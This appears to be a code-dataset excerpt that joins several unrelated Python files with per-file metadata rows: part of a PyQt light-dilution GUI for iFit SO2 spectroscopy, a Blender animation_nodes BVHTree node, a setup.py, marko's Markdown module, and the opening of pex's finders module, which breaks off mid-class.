    layout.addWidget(QLabel('iFit Output:\n(W2):'), 3, 0)
    self.ifit_2_path = QLineEdit()
    self.ifit_2_path.setFixedHeight(25)
    layout.addWidget(self.ifit_2_path, 3, 1, 1, 3)
    btn = QPushButton('Browse')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(partial(browse, self, self.ifit_2_path,
                                'single', "Comma separated (*.csv)"))
    layout.addWidget(btn, 3, 4)
    btn = QPushButton('Load')
    btn.setFixedSize(70, 25)
    btn.clicked.connect(self.load_ifit_data)
    layout.addWidget(btn, 2, 5, 2, 1)
# =============================================================================
# Program outputs
# =============================================================================
    def _createOutput(self):
        """Create program output widgets.

        Builds the log panel: a QTextEditLogger widget is registered as a
        handler on the root logger so that all program log messages (INFO
        and above) are displayed in the GUI.
        """
        # Generate the layout
        layout = QGridLayout(self.outputFrame)

        # Create a textbox to display the program messages
        self.logBox = QTextEditLogger(self)
        # Show only the message text, no level/timestamp prefix
        self.logBox.setFormatter(logging.Formatter('%(message)s'))
        logging.getLogger().addHandler(self.logBox)
        logging.getLogger().setLevel(logging.INFO)
        layout.addWidget(self.logBox.widget, 0, 0)
# =============================================================================
# Graphs
# =============================================================================
    def _createGraphs(self):
        """Generate the graphs.

        Creates a single pyqtgraph plot of W2 SO2 SCD against W1 SO2 SCD,
        which is where both the computed light dilution curves and the
        loaded iFit results are drawn.
        """
        # Generate the graph layout and window
        layout = QGridLayout(self.graphFrame)
        pg.setConfigOptions(antialias=True)
        graphwin = pg.GraphicsLayoutWidget(show=True)

        # Make the graphs
        self.ax = graphwin.addPlot()
        self.ax.setDownsampling(mode='peak')
        self.ax.setClipToView(True)
        self.ax.showGrid(x=True, y=True)

        # Add axis labels
        self.ax.setLabel('left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
        self.ax.setLabel('bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')

        # Create an order parameter to scale the graphs
        # (pyqtgraph struggles to display very large axis values, so data is
        # divided by 10**order before plotting; None means "not yet set")
        self.order = None

        # Add the graphs to the layout
        layout.addWidget(graphwin, 0, 0, 0, 0)
# =============================================================================
# Program functions
# =============================================================================
    def calc_ld_curves(self):
        """Calculate Light Dilution curve data.

        Collects the fit windows, grids and spectra file lists from the GUI
        widgets, then launches an LDWorker on a background QThread so the
        GUI stays responsive. Results arrive asynchronously through the
        worker's ``data`` signal (handled by :meth:`handle_data`).
        """
        # Disable buttons while the analysis runs; re-enabled by
        # analysis_complete() when the worker finishes
        self.start_btn.setEnabled(False)
        self.save_btn.setEnabled(False)

        # Pull the waveband data from the LD gui and pad for the initial fit
        self.widgetData['fit_lo'] = self.wb1_lo.value() - 1
        self.widgetData['fit_hi'] = self.wb2_hi.value() + 1

        # Grab the spectra type from the GUI
        self.widgetData['spec_type'] = self.spec_type.currentText()

        # Pull the waveband, SO2 and LDF grid info from the GUI
        ld_kwargs = {'wb1': [self.wb1_lo.value(), self.wb1_hi.value()],
                     'wb2': [self.wb2_lo.value(), self.wb2_hi.value()],
                     'so2_lims': [float(self.so2_grid_lo.text()),
                                  float(self.so2_grid_hi.text())],
                     'so2_step': float(self.so2_grid_step.text()),
                     'ldf_lims': [float(self.ldf_grid_lo.text()),
                                  float(self.ldf_grid_hi.text())],
                     'ldf_step': float(self.ldf_grid_step.text())}

        # Load the spectra to fit (one file path per line in the text boxes)
        spec_fnames = self.spec_fnames.toPlainText().split('\n')
        dark_fnames = self.dark_fnames.toPlainText().split('\n')

        # Initialise the analysis worker and wire up the standard
        # worker-object/QThread lifetime: quit the thread and delete both
        # objects once the worker reports it has finished
        self.ldThread = QThread()
        self.ldWorker = LDWorker(spec_fnames, dark_fnames, self.widgetData,
                                 ld_kwargs)
        self.ldWorker.moveToThread(self.ldThread)
        self.ldThread.started.connect(self.ldWorker.run)
        self.ldWorker.finished.connect(self.analysis_complete)
        self.ldWorker.data.connect(self.handle_data)
        self.ldWorker.finished.connect(self.ldThread.quit)
        self.ldWorker.finished.connect(self.ldWorker.deleteLater)
        self.ldThread.finished.connect(self.ldThread.deleteLater)
        self.ldThread.start()
def handle_data(self, ld_results):
"""Handle the LD results."""
self.ld_results = ld_results
self.plot_ld_curves(ld_results)
def analysis_complete(self):
"""Run when LD analysis is complete."""
self.start_btn.setEnabled(True)
self.save_btn.setEnabled(True)
def save_ld_curves(self):
"""Save Light Dilution curve data."""
if self.save_path.text() == '':
filter = "Text (*.txt)"
fname, _ = QFileDialog.getSaveFileName(self, 'Save As', '', filter)
else:
fname = self.save_path.text()
header = 'LDF Curves generated by iFit. All SCDs in [molec/cm^2]\n' \
+ f'W1: {self.wb1_lo.value()} - {self.wb1_hi.value()} nm\n' \
+ f'W2: {self.wb2_lo.value()} - {self.wb2_hi.value()} nm\n' \
+ 'LDF\tModel_SO2_SCD\tW1_SO2_SCD\tW1_SO2_Err\t' \
+ 'W2_SO2_SCD\tW2_SO2_Err'
np.savetxt(fname, self.ld_results, header=header)
logger.info('Light dilution curve data saved!')
def load_ld_curves(self):
"""Load the light dilution curve data."""
if self.load_path.text() == '':
filter = "Text (*.txt)"
fname, _ = QFileDialog.getOpenFileName(self, 'Load', '', filter)
else:
fname = self.load_path.text()
self.ld_results = np.loadtxt(fname)
self.plot_ld_curves(self.ld_results)
logger.info('Light dilution curve data loaded!')
    def load_ifit_data(self):
        """Load iFit analysis results for the two wavebands and plot them.

        Reads the W1 and W2 iFit output CSV files, scales the SO2 columns
        by 10**order (to work around pyqtgraph's difficulty displaying very
        large axis values) and adds the points as a scatter series to the
        curve plot.
        """
        # Read in the iFit analysis results
        df1 = pd.read_csv(self.ifit_1_path.text(), comment='#')
        df2 = pd.read_csv(self.ifit_2_path.text(), comment='#')

        # Determine the axis scaling order from the data the first time
        # data is plotted (self.order is reset to None by plot_ld_curves)
        if self.order is None:
            max_val = np.max([np.nanmax(df1['SO2']), np.nanmax(df2['SO2'])])

            if ~np.isnan(max_val) and max_val > 1e6:
                # Scale so values are displayed with at most two digits
                # before the decimal point
                self.order = int(np.ceil(np.log10(max_val))) - 1
                self.ax.setLabel(
                    'left',
                    'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>) '
                    + f'(1e{self.order})'
                )
                self.ax.setLabel(
                    'bottom',
                    'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>) '
                    + f'(1e{self.order})'
                )

            else:
                # Small values need no scaling
                self.order = 0
                self.ax.setLabel(
                    'left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
                self.ax.setLabel(
                    'bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')

        plotx = df1['SO2'] / 10**self.order
        ploty = df2['SO2'] / 10**self.order

        # Plot on the graph as hollow circles
        p0 = pg.mkPen(color='#1f77b4', width=0.5)
        line = self.ax.plot(plotx, ploty, pen=None, symbolPen=p0,
                            symbol='o', brush=None)
        line.setAlpha(0.75, False)

        logger.info('iFit data loaded!')
    def plot_ld_curves(self, ld_results):
        """Plot the light dilution curves.

        Parameters
        ----------
        ld_results : numpy array
            Curve data as saved/loaded by this tool. Columns are
            [LDF, model SO2 SCD, W1 SO2 SCD, W1 err, W2 SO2 SCD, W2 err];
            one curve is drawn per unique LDF value.
        """
        # Clear the plot
        self.ax.clear()
        # Reset the axis scaling so it is recomputed from this data set
        self.order = None

        # Pull out the unique LDF values
        ldf_grid = np.unique(ld_results[:, 0])

        # Check for large number in the time series. This is due to
        # a bug in pyqtgraph not displaying large numbers
        # NOTE(review): self.order was just set to None above, so this
        # guard is always true here — kept for symmetry with
        # load_ifit_data
        if self.order is None:
            max_val = np.max([np.nanmax(np.abs(ld_results[:, 2])),
                              np.nanmax(np.abs(ld_results[:, 4]))])

            # Calculate the required order and update the axes labels
            if ~np.isnan(max_val) and max_val > 1e6:
                self.order = int(np.ceil(np.log10(max_val))) - 1
                self.ax.setLabel(
                    'left',
                    'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>) '
                    + f'(1e{self.order})'
                )
                self.ax.setLabel(
                    'bottom',
                    'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>) '
                    + f'(1e{self.order})'
                )

            else:
                self.order = 0
                self.ax.setLabel(
                    'left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
                self.ax.setLabel(
                    'bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')

        # Get the curve data for each LDF value
        legend = self.ax.addLegend()
        for i, ldf in enumerate(ldf_grid):
            row_idx = np.where(ld_results[:, 0] == ldf)[0]
            so2_scd_1 = ld_results[row_idx, 2]
            # so2_err_1 = ld_results[row_idx, 3]
            so2_scd_2 = ld_results[row_idx, 4]
            # so2_err_2 = ld_results[row_idx, 5]

            # Adjust for large numbers if neccissary
            if self.order is not None:
                so2_scd_1 = so2_scd_1 / 10**self.order
                so2_scd_2 = so2_scd_2 / 10**self.order

            # Plot! (cycle through 10 colours for successive curves)
            line = self.ax.plot(so2_scd_1, so2_scd_2,
                                pen=pg.mkPen(color=COLORS[i % 10], width=2.0))
            legend.addItem(line, name=f'LDF={ldf:.02f}')
# =============================================================================
# Useful functions
# =============================================================================
def browse(gui, widget, mode='single', filter=False):
    """Open a file dialogue and write the selection into a widget.

    Parameters
    ----------
    gui : QWidget
        Parent widget for the dialog.
    widget : QLineEdit or QTextEdit
        Widget whose text is set to the chosen path(s). Cancelling the
        dialog leaves the widget unchanged.
    mode : str
        One of 'single', 'multi', 'save' or 'folder'.
    filter : str or False
        File type filter string, e.g. ``"Text (*.txt)"``. If False, no
        filter is applied.
    """
    # Always offer an "All Files" option alongside the supplied filter
    if not filter:
        filter = None
    else:
        filter = filter + ';;All Files (*)'

    if mode == 'single':
        fname, _ = QFileDialog.getOpenFileName(gui, 'Select File', '',
                                               filter)
        if fname != '':
            widget.setText(fname)

    elif mode == 'multi':
        fnames, _ = QFileDialog.getOpenFileNames(gui, 'Select Files', '',
                                                 filter)
        if fnames != []:
            widget.setText('\n'.join(fnames))

    elif mode == 'save':
        fname, _ = QFileDialog.getSaveFileName(gui, 'Save As', '', filter)
        if fname != '':
            widget.setText(fname)

    elif mode == 'folder':
        # Bug fix: dialog title previously read "Select Foler"
        fname = QFileDialog.getExistingDirectory(gui, 'Select Folder')
        if fname != '':
            # Trailing separator so the path can be prefixed to file names
            widget.setText(fname + '/')
# Create a worker to handle QThreads for light dilution analysis
class LDWorker(QObject):
    """Worker object that runs the light dilution analysis on a QThread.

    Parameters
    ----------
    spec_fnames : list of str
        File paths of the measurement spectra to average and analyse
    dark_fnames : list of str
        File paths of the dark spectra to average
    widgetData : dict
        Analysis settings pulled from the GUI widgets (fit window,
        spectrometer settings, model parameters, ...)
    ld_kwargs : dict
        Keyword arguments forwarded to generate_ld_curves (wavebands and
        the SO2/LDF grids)

    Attributes
    ----------
    is_paused : bool
        State to show if the worker has been paused
    is_killed : bool
        State to show if the worker has been killed
    """

    # Define signals
    finished = pyqtSignal()
    data = pyqtSignal(np.ndarray)
    error = pyqtSignal(tuple)

    def __init__(self, spec_fnames, dark_fnames, widgetData, ld_kwargs):
        """Initialise."""
        # Bug fix: was ``super(QObject, self).__init__()``, which skips
        # QObject.__init__ in the MRO; initialise the base class properly
        super(LDWorker, self).__init__()

        # Create stopped and paused flags
        self.is_paused = False
        self.is_killed = False

        # Create a holder for the spectrum filepath
        self.spec_fnames = spec_fnames
        self.dark_fnames = dark_fnames
        self.widgetData = widgetData
        self.ld_kwargs = ld_kwargs

    def run(self):
        """Launch worker function, reporting any error via the error
        signal and always emitting finished."""
        try:
            self._run()
        except Exception:
            traceback.print_exc()
            exctype, value = sys.exc_info()[:2]
            self.error.emit((exctype, value, traceback.format_exc()))
        self.finished.emit()

    def _run(self):
        """Launch LD analysis from the GUI."""
        # Read in the spectra
        spectrum = average_spectra(self.spec_fnames,
                                   self.widgetData['spec_type'],
                                   self.widgetData['wl_calib'])

        if self.widgetData['dark_flag']:
            x, dark = average_spectra(self.dark_fnames,
                                      self.widgetData['spec_type'],
                                      self.widgetData['wl_calib'])
        else:
            dark = 0

        # Generate the analyser
        logger.info('Generating the iFit analyser...')
        self.analyser = self.generate_analyser()
        self.analyser.dark_spec = dark

        # Generate the light dilution curves; results are pushed back to
        # the GUI thread through the data signal
        logger.info('Beginning light dilution calculations')
        ld_results = generate_ld_curves(self.analyser, spectrum,
                                        **self.ld_kwargs)
        self.data.emit(ld_results)

    def generate_analyser(self):
        """Generate an iFit Analyser from the GUI widget data."""
        # Initialise the Parameters
        logger.info('Generating model analyser')
        self.params = Parameters()

        # Pull the parameters from the parameter table
        for line in self.widgetData['gas_params']:
            self.params.add(name=line[0], value=line[1], vary=line[2],
                            xpath=line[4], plume_gas=line[3])
        for i, line in enumerate(self.widgetData['bgpoly_params']):
            self.params.add(name=f'bg_poly{i}', value=line[0], vary=line[1])
        for i, line in enumerate(self.widgetData['offset_params']):
            self.params.add(name=f'offset{i}', value=line[0], vary=line[1])
        for i, line in enumerate(self.widgetData['shift_params']):
            self.params.add(name=f'shift{i}', value=line[0], vary=line[1])

        # Check if ILS is in the fit
        if self.widgetData['ils_mode'] == 'Manual':
            self.params.add('fwem', value=float(self.widgetData['fwem']),
                            vary=self.widgetData['fwem_fit'])
            self.params.add('k', value=float(self.widgetData['k']),
                            vary=self.widgetData['k_fit'])
            self.params.add('a_w', value=float(self.widgetData['a_w']),
                            vary=self.widgetData['a_w_fit'])
            self.params.add('a_k', value=float(self.widgetData['a_k']),
                            vary=self.widgetData['a_k_fit'])

        # Add the light dilution factor (only if fitted or non-zero)
        if self.widgetData['ldf_fit'] or self.widgetData['ldf'] != 0.0:
            self.params.add('LDF', value=float(self.widgetData['ldf']),
                            vary=self.widgetData['ldf_fit'])

        # Report fitting parameters
        logger.info(self.params.pretty_print(cols=['name', 'value', 'vary',
                                                   'xpath']))

        # Get the bad pixels (comma-separated pixel indices, may be empty)
        if self.widgetData['bad_pixels'] != '':
            bad_pixels = [int(i) for i
                          in self.widgetData['bad_pixels'].split(',')]
        else:
            bad_pixels = []

        # Generate the analyser
        analyser = Analyser(params=self.params,
                            fit_window=[self.widgetData['fit_lo'],
                                        self.widgetData['fit_hi']],
                            frs_path=self.widgetData['frs_path'],
                            model_padding=self.widgetData['model_padding'],
                            model_spacing=self.widgetData['model_spacing'],
                            flat_flag=self.widgetData['flat_flag'],
                            flat_path=self.widgetData['flat_path'],
                            stray_flag=self.widgetData['stray_flag'],
                            stray_window=[self.widgetData['stray_lo'],
                                          self.widgetData['stray_hi']],
                            dark_flag=self.widgetData['dark_flag'],
                            ils_type=self.widgetData['ils_mode'],
                            ils_path=self.widgetData['ils_path'],
                            despike_flag=self.widgetData['despike_flag'],
                            spike_limit=self.widgetData['spike_limit'],
                            bad_pixels=bad_pixels)

        return analyser

    def pause(self):
        """Toggle the paused state of the analysis/acquisition."""
        # NOTE: despite the name this toggles rather than only pausing;
        # preserved as callers may rely on the toggle behaviour
        if self.is_paused:
            self.is_paused = False
        else:
            self.is_paused = True

    def resume(self):
        """Resume the analysis/acquisition."""
        self.is_paused = False

    def stop(self):
        """Terminate the analysis/acquisition."""
        if self.is_paused:
            self.is_paused = False
        # Bug fix: previously set ``self.is_stopped``, an attribute that is
        # never defined or read anywhere; the kill flag declared in
        # __init__ is ``is_killed``
        self.is_killed = True
class QHLine(QFrame):
    """A thin sunken horizontal separator line."""

    def __init__(self):
        """Initialise the frame as a sunken horizontal rule."""
        super().__init__()
        self.setFrameShadow(QFrame.Sunken)
        self.setFrameShape(QFrame.HLine)
# Cliet Code
def main():
    """Configure the Qt application, apply the dark theme and launch the
    GUI, blocking until the event loop exits."""
    # Create an instance of QApplication with the Fusion style
    app = QApplication(sys.argv)
    app.setStyle("Fusion")

    # Dark colour scheme, applied role-by-role through a palette
    grey = QColor(53, 53, 53)
    blue = QColor(42, 130, 218)
    palette = QPalette()
    for role, colour in [(QPalette.Window, grey),
                         (QPalette.WindowText, Qt.white),
                         (QPalette.Base, QColor(25, 25, 25)),
                         (QPalette.AlternateBase, grey),
                         (QPalette.ToolTipBase, Qt.black),
                         (QPalette.ToolTipText, Qt.white),
                         (QPalette.Text, Qt.white),
                         (QPalette.Button, grey),
                         (QPalette.ButtonText, Qt.white),
                         (QPalette.BrightText, Qt.red),
                         (QPalette.Link, blue),
                         (QPalette.Highlight, blue),
                         (QPalette.HighlightedText, Qt.black)]:
        palette.setColor(role, colour)
    # Group-specific overrides
    palette.setColor(QPalette.Active, QPalette.Button, grey)
    palette.setColor(QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)
    app.setPalette(palette)

    # Show the GUI
    view = CalcFlux()
    view.show()

    # Execute the main loop
    sys.exit(app.exec_())
# Bug fix: three stray unconditional main() calls followed the guard,
# which would launch the GUI repeatedly (and on import); only the guarded
# call is kept.
if __name__ == '__main__':
    main()
| 38.054703
| 79
| 0.552025
|
acff5f713632fce33c21a68b8f3673f2584ef380
| 2,466
|
py
|
Python
|
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2020-04-16T22:12:40.000Z
|
2022-01-22T17:18:45.000Z
|
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | null | null | null |
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2019-05-16T04:01:09.000Z
|
2020-08-25T11:42:26.000Z
|
import bpy
from bpy.props import *
from mathutils.bvhtree import BVHTree
from ... base_types import AnimationNode
# (identifier, UI label, description, icon, unique number) tuples for the
# node's "Source Type" EnumProperty
sourceTypeItems = [
    ("MESH_DATA", "Mesh", "", "NONE", 0),
    ("BMESH", "BMesh", "", "NONE", 1),
    ("OBJECT", "Object", "", "NONE", 2) ]
class ConstructBVHTreeNode(bpy.types.Node, AnimationNode):
    """Animation node that builds a BVH tree (for fast spatial queries)
    from raw mesh data, a BMesh, or an object."""
    bl_idname = "an_ConstructBVHTreeNode"
    bl_label = "Construct BVHTree"
    bl_width_default = 160

    sourceType: EnumProperty(name = "Source Type", default = "MESH_DATA",
        items = sourceTypeItems, update = AnimationNode.refresh)

    def create(self):
        # Input sockets depend on the selected source type
        if self.sourceType == "MESH_DATA":
            self.newInput("Vector List", "Vector List", "vectorList")
            self.newInput("Polygon Indices List", "Polygon Indices", "polygonsIndices")
        elif self.sourceType == "BMESH":
            self.newInput("BMesh", "BMesh", "bm")
        elif self.sourceType == "OBJECT":
            self.newInput("Object", "Object", "object", defaultDrawType = "PROPERTY_ONLY")
        self.newInput("Float", "Epsilon", "epsilon", hide = True, minValue = 0)
        self.newOutput("BVHTree", "BVHTree", "bvhTree")

    def draw(self, layout):
        layout.prop(self, "sourceType", text = "Source")

    def getExecutionFunctionName(self):
        # Dispatch to the execute_* method matching the source type
        if self.sourceType == "MESH_DATA":
            return "execute_Mesh"
        elif self.sourceType == "BMESH":
            return "execute_BMesh"
        elif self.sourceType == "OBJECT":
            return "execute_Object"

    def execute_Mesh(self, vectorList, polygonsIndices, epsilon):
        if len(polygonsIndices) == 0:
            return self.getFallbackBVHTree()
        if 0 <= polygonsIndices.getMinIndex() <= polygonsIndices.getMaxIndex() < len(vectorList):
            return BVHTree.FromPolygons(vectorList, polygonsIndices, epsilon = max(epsilon, 0))
        # Bug fix: previously fell through and returned None when the
        # polygon indices referenced vertices outside vectorList; return
        # the socket's fallback BVHTree as the other failure paths do
        return self.getFallbackBVHTree()

    def execute_BMesh(self, bm, epsilon):
        return BVHTree.FromBMesh(bm, epsilon = max(epsilon, 0))

    def execute_Object(self, object, epsilon):
        if object is None:
            return self.getFallbackBVHTree()
        if object.type != "MESH":
            return self.getFallbackBVHTree()
        mesh = object.data
        # Transform vertices into world space so the BVH tree matches the
        # object's placement in the scene
        vertices = mesh.an.getVertices()
        vertices.transform(object.matrix_world)
        polygons = mesh.an.getPolygonIndices()
        return self.execute_Mesh(vertices, polygons, epsilon)

    def getFallbackBVHTree(self):
        # Default value of the BVHTree output socket
        return self.outputs[0].getDefaultValue()
| 37.363636
| 97
| 0.639497
|
acff5facc1dc95b709c68cb4336ee0f4eb77936c
| 323
|
py
|
Python
|
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | 1
|
2019-07-19T20:46:56.000Z
|
2019-07-19T20:46:56.000Z
|
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | null | null | null |
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | null | null | null |
from setuptools import setup

# Package metadata for the fediplay tool: a single-module distribution
# exposing a `fediplay` console command
setup(
    name='fediplay',
    version='0.1',
    py_modules=['fediplay'],
    # Runtime dependencies: Mastodon API client, HTML scraping (cssselect +
    # lxml) and audio downloading
    install_requires=[
        'Mastodon.py',
        'cssselect',
        'lxml',
        'youtube-dl'
    ],
    # Install a `fediplay` command that invokes fediplay.main()
    entry_points={
        'console_scripts': [
            'fediplay = fediplay:main'
        ]
    }
)
| 16.15
| 38
| 0.50774
|
acff5ffa5f9fdcfd256f3945df3032b88115d1dd
| 4,946
|
py
|
Python
|
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
#! -*- coding: utf-8 -*-
"""
_ _ _ ___ _ _ ___
| \ / | /_\ | _ \ | |/ / / _ \
| |\/| | / _ \ | / | ' < | (_) |
|_| |_| /_/ \_\ |_|_\ |_|\_\ \___/
A markdown parser with high extensibility.
Licensed under MIT.
Created by Frost Ming<mianghong@gmail.com>
"""
from .html_renderer import HTMLRenderer
from .renderer import Renderer
from .parser import Parser
from .helpers import is_type_check, load_extension_object
from ._compat import string_types
if is_type_check():
from typing import Type, List, Any, Optional
from .block import Document
from .parser import ElementType
__version__ = "0.8.2"
class SetupDone(Exception):
    """Raised when extensions are registered after setup has completed."""

    def __str__(self):
        return "Unable to register more extensions after setup done."
class Markdown(object):
    """The main class to convert markdown documents.

    Attributes:

    * parser: an instance of :class:`marko.parser.Parser`
    * renderer: an instance of :class:`marko.renderer.Renderer`

    :param parser: a subclass :class:`marko.parser.Parser`.
    :param renderer: a subclass :class:`marko.renderer.Renderer`.
    :param extensions: a list of extensions to register on the object.
        See document of :meth:`Markdown.use()`.
    """

    def __init__(self, parser=Parser, renderer=HTMLRenderer, extensions=None):
        # type: (Type[Parser], Type[Renderer], Optional[Any]) -> None
        assert issubclass(parser, Parser)
        self._base_parser = parser
        self._parser_mixins = []  # type: List[Any]

        assert issubclass(renderer, Renderer)
        self._base_renderer = renderer
        self._renderer_mixins = []  # type: List[Any]

        self._extra_elements = []  # type: List[ElementType]
        # Once the mixin classes are composed (in _setup_extensions) no
        # further extensions may be registered
        self._setup_done = False
        if extensions:
            self.use(*extensions)

    def use(self, *extensions):  # type: (Any) -> None
        """Register extensions to Markdown object.
        An extension should be either an object providing ``elements``, `parser_mixins`
        , ``renderer_mixins`` or all attributes, or a string representing the
        corresponding extension in ``marko.ext`` module.

        :param \*extensions: extension object or string.

        .. note:: Marko uses a mixin based extension system, the order of extensions
            matters: An extension preceding in order will have higher priority.
        """
        if self._setup_done:
            raise SetupDone()
        for extension in extensions:
            if isinstance(extension, string_types):
                # Resolve "name" to the extension object in marko.ext
                extension = load_extension_object(extension)()
            # Prepend so that later-registered extensions take priority in
            # the MRO of the composed classes
            self._parser_mixins = (
                getattr(extension, "parser_mixins", []) + self._parser_mixins
            )
            self._renderer_mixins = (
                getattr(extension, "renderer_mixins", []) + self._renderer_mixins
            )
            self._extra_elements.extend(getattr(extension, "elements", []))

    def _setup_extensions(self):  # type: () -> None
        """Install all extensions and set things up."""
        if self._setup_done:
            return
        # Compose the final parser/renderer classes dynamically, with the
        # registered mixins ahead of the base classes
        self.parser = type(
            "MarkdownParser", tuple(self._parser_mixins) + (self._base_parser,), {}
        )()
        for e in self._extra_elements:
            self.parser.add_element(e)
        self.renderer = type(
            "MarkdownRenderer",
            tuple(self._renderer_mixins) + (self._base_renderer,),
            {},
        )()
        self._setup_done = True

    def convert(self, text):  # type: (str) -> str
        """Parse and render the given text."""
        return self.render(self.parse(text))

    def __call__(self, text):  # type: (str) -> str
        # Calling the object is equivalent to convert()
        return self.convert(text)

    def parse(self, text):  # type: (str) -> Document
        """Call ``self.parser.parse(text)``.

        Override this to preprocess text or handle parsed result.
        """
        self._setup_extensions()
        return self.parser.parse(text)

    def render(self, parsed):  # type: (Document) -> str
        """Call ``self.renderer.render(text)``.

        Override this to handle parsed result.
        """
        self.renderer.root_node = parsed
        with self.renderer as r:
            return r.render(parsed)
# Inner instance, use the bare convert/parse/render function instead
_markdown = Markdown()
def convert(text):  # type: (str) -> str
    """Parse and render the given text.

    :param text: text to convert.
    :returns: The rendered result.
    """
    # The module-level Markdown instance is callable; calling it is
    # equivalent to convert()
    return _markdown(text)
def parse(text):  # type: (str) -> Document
    """Parse the text to a structured data object.

    :param text: text to parse.
    :returns: the parsed object
    """
    # Delegate to the shared module-level Markdown instance
    document = _markdown.parse(text)
    return document
def render(parsed):  # type: (Document) -> str
    """Render the parsed object to text.

    :param parsed: the parsed object
    :returns: the rendered result.
    """
    # Delegate to the shared module-level Markdown instance
    output = _markdown.render(parsed)
    return output
| 31.503185
| 88
| 0.615649
|
acff60b89814410e5ac39648637c98de9123f2d4
| 7,712
|
py
|
Python
|
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | 1
|
2019-06-16T07:05:33.000Z
|
2019-06-16T07:05:33.000Z
|
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | null | null | null |
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""The finders we wish we had in setuptools.
As of setuptools 3.3, the only finder for zip-based distributions is for eggs. The path-based
finder only searches paths ending in .egg and not in .whl (zipped or unzipped.)
pex.finders augments pkg_resources with additional finders to achieve functional
parity between wheels and eggs in terms of findability with find_distributions.
To use: ::
>>> from pex.finders import register_finders
>>> register_finders()
"""
import os
import pkgutil
import sys
import zipimport
import pkg_resources
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
class ChainedFinder(object):
  """A pkg_resources finder that delegates to an ordered list of finders."""

  @classmethod
  def of(cls, *chained_finder_or_finder):
    """Build a ChainedFinder, flattening any ChainedFinder arguments so the
    result holds a single flat list of plain finders."""
    finders = []
    for candidate in chained_finder_or_finder:
      if isinstance(candidate, cls):
        finders.extend(candidate.finders)
      else:
        finders.append(candidate)
    return cls(finders)

  def __init__(self, finders):
    self.finders = finders

  def __call__(self, importer, path_item, only=False):
    # Yield distributions from each delegate finder in registration order
    for delegate in self.finders:
      for dist in delegate(importer, path_item, only=only):
        yield dist

  def __eq__(self, other):
    # Two chains are equal iff they hold the same finders in the same order
    return isinstance(other, ChainedFinder) and self.finders == other.finders
# The following methods are somewhat dangerous as pkg_resources._distribution_finders is not an
# exposed API. As it stands, pkg_resources doesn't provide an API to chain multiple distribution
# finders together. This is probably possible using importlib but that does us no good as the
# importlib machinery supporting this is only available in Python >= 3.1.
def _get_finder(importer):
  """Return the pkg_resources finder registered for ``importer``, or None
  if the private registry is unavailable or has no entry."""
  if hasattr(pkg_resources, '_distribution_finders'):
    return pkg_resources._distribution_finders.get(importer)
  return None
def _add_finder(importer, finder):
  """Register a new pkg_resources path finder that does not replace the existing finder."""
  existing = _get_finder(importer)
  if existing:
    # Chain behind the current finder rather than replacing it
    pkg_resources.register_finder(importer, ChainedFinder.of(existing, finder))
  else:
    pkg_resources.register_finder(importer, finder)
def _remove_finder(importer, finder):
  """Remove an existing finder from pkg_resources.

  If the registered finder is a ChainedFinder, ``finder`` is removed from
  its chain and the registration is collapsed when one or zero finders
  remain. Otherwise the registration is cleared only when the registered
  finder is the one being removed.
  """
  existing_finder = _get_finder(importer)

  if not existing_finder:
    return

  if isinstance(existing_finder, ChainedFinder):
    try:
      existing_finder.finders.remove(finder)
    except ValueError:
      return
    if len(existing_finder.finders) == 1:
      # Collapse a single-element chain back to the bare finder
      pkg_resources.register_finder(importer, existing_finder.finders[0])
    elif len(existing_finder.finders) == 0:
      pkg_resources.register_finder(importer, pkg_resources.find_nothing)
    # More than one finder remains: the chain was mutated in place, so the
    # existing registration is already up to date.
  else:
    # Bug fix: previously find_nothing was registered unconditionally in
    # this branch, which could drop an unrelated registered finder. Only
    # unregister when the registered finder is the one being removed.
    if existing_finder == finder:
      pkg_resources.register_finder(importer, pkg_resources.find_nothing)
class WheelMetadata(pkg_resources.EggMetadata):
  """Metadata provider for zipped wheels."""

  @classmethod
  def _split_wheelname(cls, wheelname):
    # A wheel filename is name-version-pytag-abitag-platform.whl; dropping
    # the last three dash-separated tags recovers the "name-version" prefix
